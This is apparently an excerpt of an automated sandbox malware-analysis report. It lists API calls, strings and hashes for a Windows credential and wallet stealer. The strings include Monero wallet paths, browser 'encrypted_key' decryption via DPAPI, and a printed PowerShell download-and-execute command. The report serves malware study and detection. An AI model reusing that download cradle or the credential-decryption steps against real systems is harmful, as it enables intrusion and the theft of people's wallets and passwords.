                                     • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                    • String ID:
                                    • API String ID: 2311089104-0
                                    • Opcode ID: c84cfde95bcff4f5f269c52cd3f8f2200eaa24689e83c1f1822aef870e81aad4
                                    • Instruction ID: 88991a6952dcafa1fa93b7a41a377b821898a9cd4ca19e53b69698ee17657fa6
                                    • Opcode Fuzzy Hash: c84cfde95bcff4f5f269c52cd3f8f2200eaa24689e83c1f1822aef870e81aad4
                                    • Instruction Fuzzy Hash: 67315CB4E00209EFDB24CF95D889BAE77B4FF48710F108168E901A7290D7B8A941DFA0
                                    APIs
                                    • lstrcat.KERNEL32(?,0180E470), ref: 00FF47DB
                                      • Part of subcall function 00FF8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00FF8E0B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FF4801
                                    • lstrcat.KERNEL32(?,?), ref: 00FF4820
                                    • lstrcat.KERNEL32(?,?), ref: 00FF4834
                                    • lstrcat.KERNEL32(?,017FAC70), ref: 00FF4847
                                    • lstrcat.KERNEL32(?,?), ref: 00FF485B
                                    • lstrcat.KERNEL32(?,0180D968), ref: 00FF486F
                                      • Part of subcall function 00FFA740: lstrcpy.KERNEL32(01000E17,00000000), ref: 00FFA788
                                      • Part of subcall function 00FF8D90: GetFileAttributesA.KERNEL32(00000000,?,00FE1B54,?,?,0100564C,?,?,01000E1F), ref: 00FF8D9F
                                      • Part of subcall function 00FF4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00FF4580
                                      • Part of subcall function 00FF4570: RtlAllocateHeap.NTDLL(00000000), ref: 00FF4587
                                      • Part of subcall function 00FF4570: wsprintfA.USER32 ref: 00FF45A6
                                      • Part of subcall function 00FF4570: FindFirstFileA.KERNEL32(?,?), ref: 00FF45BD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                     • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                    • String ID:
                                    • API String ID: 2540262943-0
                                    • Opcode ID: 60ce056f3211d68037717e95b311ec51aa48f4f4311b764fbb290e5132fdb527
                                    • Instruction ID: 9cc171c3bf6470b01818d9978ad560c9eedad05641643ca61075d19dd77bfae7
                                    • Opcode Fuzzy Hash: 60ce056f3211d68037717e95b311ec51aa48f4f4311b764fbb290e5132fdb527
                                    • Instruction Fuzzy Hash: 9F3153B690021C67CB30FBA0DC89EFD7378AF58700F404589F31996495EEB8D689DB95
                                    APIs
                                      • Part of subcall function 00FFA740: lstrcpy.KERNEL32(01000E17,00000000), ref: 00FFA788
                                      • Part of subcall function 00FFA9B0: lstrlen.KERNEL32(?,01809130,?,\Monero\wallet.keys,01000E17), ref: 00FFA9C5
                                      • Part of subcall function 00FFA9B0: lstrcpy.KERNEL32(00000000), ref: 00FFAA04
                                      • Part of subcall function 00FFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FFAA12
                                      • Part of subcall function 00FFA920: lstrcpy.KERNEL32(00000000,?), ref: 00FFA972
                                      • Part of subcall function 00FFA920: lstrcat.KERNEL32(00000000), ref: 00FFA982
                                      • Part of subcall function 00FFA8A0: lstrcpy.KERNEL32(?,01000E17), ref: 00FFA905
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00FF2D85
                                    Strings
                                    • ')", xrefs: 00FF2CB3
                                    • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00FF2CC4
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00FF2D04
                                    • <, xrefs: 00FF2D39
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                     • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                    • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    • API String ID: 3031569214-898575020
                                    • Opcode ID: 47dff613484b3b737328bb19bde95c125d5d5adb7816e66160e41b7f4a5eaa51
                                    • Instruction ID: 95a49c52114a285144ef630da4a28f34b9a5a3bd6bbaa5c2c48fa2a22d31206e
                                    • Opcode Fuzzy Hash: 47dff613484b3b737328bb19bde95c125d5d5adb7816e66160e41b7f4a5eaa51
                                    • Instruction Fuzzy Hash: 2141CFB1C1010C9ADB14EFA0CC91BFDB774AF10340F504119F61AAB1A5EFB86A5ADF91
                                    APIs
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00FE9F41
                                      • Part of subcall function 00FFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FFA7E6
                                      • Part of subcall function 00FFA740: lstrcpy.KERNEL32(01000E17,00000000), ref: 00FFA788
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                     • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$AllocLocal
                                    • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                    • API String ID: 4171519190-1096346117
                                    • Opcode ID: b8b4f5a8a5d8a7020c67a079da991a2a6d9602809a51c21cafd99754a84fee1c
                                    • Instruction ID: 179ca54cca60f6d9a9940394b0d29482b4a20ea5f91438b7e418a8770ce61fac
                                    • Opcode Fuzzy Hash: b8b4f5a8a5d8a7020c67a079da991a2a6d9602809a51c21cafd99754a84fee1c
                                    • Instruction Fuzzy Hash: 0E61307190024CEBDB24EFA5CC96FED7775AF44340F008118FA0A5F1A5EBB86A05DB92
                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,0180D908,00000000,00020119,?), ref: 00FF40F4
                                    • RegQueryValueExA.ADVAPI32(?,0180E590,00000000,00000000,00000000,000000FF), ref: 00FF4118
                                    • RegCloseKey.ADVAPI32(?), ref: 00FF4122
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FF4147
                                    • lstrcat.KERNEL32(?,0180E4A0), ref: 00FF415B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                     • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$CloseOpenQueryValue
                                    • String ID:
                                    • API String ID: 690832082-0
                                    • Opcode ID: 6c59cfc6695fa82dca77543d9f2f480aeb97730dbb744ea9be848c30fe8c0b1d
                                    • Instruction ID: ce86eec6f47a6a79c9e9367496490cc953f315ff12ea98f8fdf148043a689253
                                    • Opcode Fuzzy Hash: 6c59cfc6695fa82dca77543d9f2f480aeb97730dbb744ea9be848c30fe8c0b1d
                                    • Instruction Fuzzy Hash: 6A4156B69002086BDB34EFA0EC4AFFE737DBB88300F444558F71557585EA759B888B91
                                    APIs
                                    • GetSystemTime.KERNEL32(?), ref: 00FF696C
                                    • sscanf.NTDLL ref: 00FF6999
                                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00FF69B2
                                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00FF69C0
                                    • ExitProcess.KERNEL32 ref: 00FF69DA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                     • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Time$System$File$ExitProcesssscanf
                                    • String ID:
                                    • API String ID: 2533653975-0
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FF7E37
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FF7E3E
                                    • RegOpenKeyExA.ADVAPI32(80000002,017FB8F8,00000000,00020119,?), ref: 00FF7E5E
                                    • RegQueryValueExA.ADVAPI32(?,0180D828,00000000,00000000,000000FF,000000FF), ref: 00FF7E7F
                                    • RegCloseKey.ADVAPI32(?), ref: 00FF7E92
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID:
                                    • API String ID: 3225020163-0
                                    APIs
                                    • StrStrA.SHLWAPI(0180E110,?,?,?,00FF140C,?,0180E110,00000000), ref: 00FF926C
                                    • lstrcpyn.KERNEL32(0122AB88,0180E110,0180E110,?,00FF140C,?,0180E110), ref: 00FF9290
                                    • lstrlen.KERNEL32(?,?,00FF140C,?,0180E110), ref: 00FF92A7
                                    • wsprintfA.USER32 ref: 00FF92C7
                                    Strings
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpynlstrlenwsprintf
                                    • String ID: %s%s
                                    • API String ID: 1206339513-3252725368
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FE12B4
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FE12BB
                                    • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00FE12D7
                                    • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00FE12F5
                                    • RegCloseKey.ADVAPI32(?), ref: 00FE12FF
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID:
                                    • API String ID: 3225020163-0
                                    APIs
                                    Strings
                                    Yara matches
                                    Similarity
                                    • API ID: String___crt$Type
                                    • String ID:
                                    • API String ID: 2109742289-3916222277
                                    APIs
                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00FF6663
                                      • Part of subcall function 00FFA740: lstrcpy.KERNEL32(01000E17,00000000), ref: 00FFA788
                                      • Part of subcall function 00FFA9B0: lstrlen.KERNEL32(?,01809130,?,\Monero\wallet.keys,01000E17), ref: 00FFA9C5
                                      • Part of subcall function 00FFA9B0: lstrcpy.KERNEL32(00000000), ref: 00FFAA04
                                      • Part of subcall function 00FFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FFAA12
                                      • Part of subcall function 00FFA8A0: lstrcpy.KERNEL32(?,01000E17), ref: 00FFA905
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00FF6726
                                    • ExitProcess.KERNEL32 ref: 00FF6755
                                    Strings
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                    • String ID: <
                                    • API String ID: 1148417306-4251816714
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,01000E28,00000000,?), ref: 00FF882F
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FF8836
                                    • wsprintfA.USER32 ref: 00FF8850
                                      • Part of subcall function 00FFA740: lstrcpy.KERNEL32(01000E17,00000000), ref: 00FFA788
                                    Strings
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateProcesslstrcpywsprintf
                                    • String ID: %dx%d
                                    • API String ID: 1695172769-2206825331
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00FF951E,00000000), ref: 00FF8D5B
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FF8D62
                                    • wsprintfW.USER32 ref: 00FF8D78
                                    Strings
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateProcesswsprintf
                                    • String ID: %hs
                                    • API String ID: 769748085-2783943728
                                    APIs
                                      • Part of subcall function 00FFA740: lstrcpy.KERNEL32(01000E17,00000000), ref: 00FFA788
                                      • Part of subcall function 00FFA9B0: lstrlen.KERNEL32(?,01809130,?,\Monero\wallet.keys,01000E17), ref: 00FFA9C5
                                      • Part of subcall function 00FFA9B0: lstrcpy.KERNEL32(00000000), ref: 00FFAA04
                                      • Part of subcall function 00FFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FFAA12
                                      • Part of subcall function 00FFA8A0: lstrcpy.KERNEL32(?,01000E17), ref: 00FFA905
                                      • Part of subcall function 00FF8B60: GetSystemTime.KERNEL32(01000E1A,0180A988,010005AE,?,?,00FE13F9,?,0000001A,01000E1A,00000000,?,01809130,?,\Monero\wallet.keys,01000E17), ref: 00FF8B86
                                      • Part of subcall function 00FFA920: lstrcpy.KERNEL32(00000000,?), ref: 00FFA972
                                      • Part of subcall function 00FFA920: lstrcat.KERNEL32(00000000), ref: 00FFA982
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00FEA2E1
                                    • lstrlen.KERNEL32(00000000,00000000), ref: 00FEA3FF
                                    • lstrlen.KERNEL32(00000000), ref: 00FEA6BC
                                      • Part of subcall function 00FFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FFA7E6
                                    • DeleteFileA.KERNEL32(00000000), ref: 00FEA743
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    APIs
                                      • Part of subcall function 00FFA740: lstrcpy.KERNEL32(01000E17,00000000), ref: 00FFA788
                                      • Part of subcall function 00FFA9B0: lstrlen.KERNEL32(?,01809130,?,\Monero\wallet.keys,01000E17), ref: 00FFA9C5
                                      • Part of subcall function 00FFA9B0: lstrcpy.KERNEL32(00000000), ref: 00FFAA04
                                      • Part of subcall function 00FFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FFAA12
                                      • Part of subcall function 00FFA8A0: lstrcpy.KERNEL32(?,01000E17), ref: 00FFA905
                                      • Part of subcall function 00FF8B60: GetSystemTime.KERNEL32(01000E1A,0180A988,010005AE,?,?,00FE13F9,?,0000001A,01000E1A,00000000,?,01809130,?,\Monero\wallet.keys,01000E17), ref: 00FF8B86
                                      • Part of subcall function 00FFA920: lstrcpy.KERNEL32(00000000,?), ref: 00FFA972
                                      • Part of subcall function 00FFA920: lstrcat.KERNEL32(00000000), ref: 00FFA982
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00FED481
                                    • lstrlen.KERNEL32(00000000), ref: 00FED698
                                    • lstrlen.KERNEL32(00000000), ref: 00FED6AC
                                    • DeleteFileA.KERNEL32(00000000), ref: 00FED72B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: ac696179618d6a7de311441352b3ceafb2f99b82a9e797f7a48fc4010ca49180
                                    • Instruction ID: 7ca04b4cd2d07ad832a78ea2250620cf981c0d2d2c4d3f98e9d7da670495a170
                                    • Opcode Fuzzy Hash: ac696179618d6a7de311441352b3ceafb2f99b82a9e797f7a48fc4010ca49180
                                    • Instruction Fuzzy Hash: BE9136B281010C9BDB14FBA0DC95DFE7338AF14340F508168F61B675A5EF786A19DB62
                                    APIs
                                      • Part of subcall function 00FFA740: lstrcpy.KERNEL32(01000E17,00000000), ref: 00FFA788
                                      • Part of subcall function 00FFA9B0: lstrlen.KERNEL32(?,01809130,?,\Monero\wallet.keys,01000E17), ref: 00FFA9C5
                                      • Part of subcall function 00FFA9B0: lstrcpy.KERNEL32(00000000), ref: 00FFAA04
                                      • Part of subcall function 00FFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FFAA12
                                      • Part of subcall function 00FFA8A0: lstrcpy.KERNEL32(?,01000E17), ref: 00FFA905
                                      • Part of subcall function 00FF8B60: GetSystemTime.KERNEL32(01000E1A,0180A988,010005AE,?,?,00FE13F9,?,0000001A,01000E1A,00000000,?,01809130,?,\Monero\wallet.keys,01000E17), ref: 00FF8B86
                                      • Part of subcall function 00FFA920: lstrcpy.KERNEL32(00000000,?), ref: 00FFA972
                                      • Part of subcall function 00FFA920: lstrcat.KERNEL32(00000000), ref: 00FFA982
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00FED801
                                    • lstrlen.KERNEL32(00000000), ref: 00FED99F
                                    • lstrlen.KERNEL32(00000000), ref: 00FED9B3
                                    • DeleteFileA.KERNEL32(00000000), ref: 00FEDA32
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: a222dd6a92d7201ed176119f43766fa84b59810f9433abe626913b8fbc1b6bd0
                                    • Instruction ID: 8117f5343898a99042a4c8f48ff444b346b74626d2d2c23b4f8178baf60471e0
                                    • Opcode Fuzzy Hash: a222dd6a92d7201ed176119f43766fa84b59810f9433abe626913b8fbc1b6bd0
                                    • Instruction Fuzzy Hash: 188114B291010C9BDB14FBA4DC95DFE7338AF54340F404128F60BA75A5EF786A19EB62
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen
                                    • String ID:
                                    • API String ID: 367037083-0
                                    • Opcode ID: 79c36fe2fcd1b65d8436392b335fcdf24c894ef3aff6741005d9e51bf5def8ac
                                    • Instruction ID: 576f3469f44cb844120cc8f3176b93d3e34d625db058dbde5708268b48e622a3
                                    • Opcode Fuzzy Hash: 79c36fe2fcd1b65d8436392b335fcdf24c894ef3aff6741005d9e51bf5def8ac
                                    • Instruction Fuzzy Hash: 53411FB1D1010DEBDB04EFA5DC85EFEB774AF44344F008418F615A62A4EB796A05EBA1
                                    APIs
                                      • Part of subcall function 00FFA740: lstrcpy.KERNEL32(01000E17,00000000), ref: 00FFA788
                                      • Part of subcall function 00FE99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FE99EC
                                      • Part of subcall function 00FE99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00FE9A11
                                      • Part of subcall function 00FE99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00FE9A31
                                      • Part of subcall function 00FE99C0: ReadFile.KERNEL32(000000FF,?,00000000,00FE148F,00000000), ref: 00FE9A5A
                                      • Part of subcall function 00FE99C0: LocalFree.KERNEL32(00FE148F), ref: 00FE9A90
                                      • Part of subcall function 00FE99C0: CloseHandle.KERNEL32(000000FF), ref: 00FE9A9A
                                      • Part of subcall function 00FF8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00FF8E52
                                    • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00FE9D39
                                      • Part of subcall function 00FE9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00FE4EEE,00000000,00000000), ref: 00FE9AEF
                                      • Part of subcall function 00FE9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00FE4EEE,00000000,?), ref: 00FE9B01
                                      • Part of subcall function 00FE9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00FE4EEE,00000000,00000000), ref: 00FE9B2A
                                      • Part of subcall function 00FE9AC0: LocalFree.KERNEL32(?,?,?,?,00FE4EEE,00000000,?), ref: 00FE9B3F
                                      • Part of subcall function 00FE9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00FE9B84
                                      • Part of subcall function 00FE9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00FE9BA3
                                      • Part of subcall function 00FE9B60: LocalFree.KERNEL32(?), ref: 00FE9BD3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                    • String ID: $"encrypted_key":"$DPAPI
                                    • API String ID: 2100535398-738592651
                                    • Opcode ID: 5fed9efcf7815514416df81d6ea964577819a7437db3fbe558db052ffb5777fe
                                    • Instruction ID: 9eb4265d30630fb7be15a0d5a1fe7083b223114f05ff59609a2040c9a47f9f42
                                    • Opcode Fuzzy Hash: 5fed9efcf7815514416df81d6ea964577819a7437db3fbe558db052ffb5777fe
                                    • Instruction Fuzzy Hash: AA315CB6D10209ABCF14EFE5DC85AEEB7B8AF48304F144518EA05A7241EB749A14DBA1
                                    APIs
